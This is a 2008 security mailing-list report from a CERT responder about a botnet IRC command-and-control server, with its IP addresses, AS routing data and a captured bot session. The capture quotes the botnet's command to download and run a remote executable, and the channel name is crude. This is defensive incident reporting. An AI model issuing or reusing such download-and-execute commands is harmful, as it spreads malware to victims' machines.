[nsp-sec] botnet c&c: ping.q8still.net, AS27524

Marius Urkis marius at litnet.lt
Mon Oct 13 05:33:48 EDT 2008 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

There is a botnet controler on ping.q8still.net:6667

ping.q8still.net        A       69.42.215.158
ping.q8still.net        A       69.42.215.174
ping.q8still.net        A       69.42.215.180
ping.q8still.net        A       69.42.215.184
ping.q8still.net        A       69.42.215.152

Server IP: 69.42.215.184
Server Port: 6667
Server AS: AS      | IP               | AS Name
Server AS: 27524   | 69.42.215.184    | XEEX-COMMUNICATIONS - Xeex
Peer AS  : PEER_AS | IP               | AS Name
Peer AS  : 2516    | 69.42.215.184    | KDDI KDDI CORPORATION
Peer AS  : 3561    | 69.42.215.184    | SAVVIS - Savvis
Peer AS  : 4565    | 69.42.215.184    | MEGAPATH2-US - MegaPath Networks
Inc.
Peer AS  : 7132    | 69.42.215.184    | SBIS-AS - AT&T Internet Services
Peer AS  : 7473    | 69.42.215.184    | SINGTEL-AS-AP Singapore Telecom
Peer AS  : 10026   | 69.42.215.184    | ANC Asia Netcom Corporation
Peer AS  : 11164   | 69.42.215.184    | TRANSITRAIL - National
LambdaRail, LLC


T 193.219.a.b:2308 -> 69.42.215.184:6667 [AP]
  USER wjufsk "" "wrd" :wjufsk..


T 69.42.215.184:6667 -> 193.219.a.b:2308 [AP]
  .foonet.com 254 bhushq 4 :channels formed..:irc.foonet.com 255 bhushq
:I have 923 clients and  0 servers..:irc.foonet.com 265 bhushq :Current
Local Users: 923  Max: 930..:irc.foonet.com 266  bhushq :Current Global
Users: 923  Max: 930..:irc.foonet.com 422 bhushq :MOTD File is missing
  ..:bhushq MODE bhushq :+iwx..


T 193.219.a.b:2308 -> 69.42.215.184:6667 [AP]
  JOIN #rape# fucker..


T 69.42.215.184:6667 -> 193.219.a.b:2308 [AP]
  :bhushq!wjufsk at F8A0C8E.F9D84B24.178A27CD.IP JOIN
:#rape#..:irc.foonet.com 332 bhushq #rape# :. download http://www
.freewebtown.com/jakxx/is162866.exe c:\is162866.exe 1..:irc.foonet.com
333  bhushq #rape# ladlkad 23882478..:irc.foonet.com 353 bhushq @ #rape#
:bhushq ..:irc.foonet.com 366 bhushq #rape# :End of /NAMES list...

- --
Marius

=============================
 Marius Urkis
 LITNET CERT
 http://cert.litnet.lt
 Tel: +370 37 300645
 GSM: +370 687 79059
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFI8xX8HS98nbdNAJwRAtdXAJ9KKV7/6NJJCDoRzwMSGpW+uF05mQCaA61S
1/JRP2LJRjD3C2wCqOwDZPY=
=GNrs
-----END PGP SIGNATURE-----

More information about the nsp-security mailing list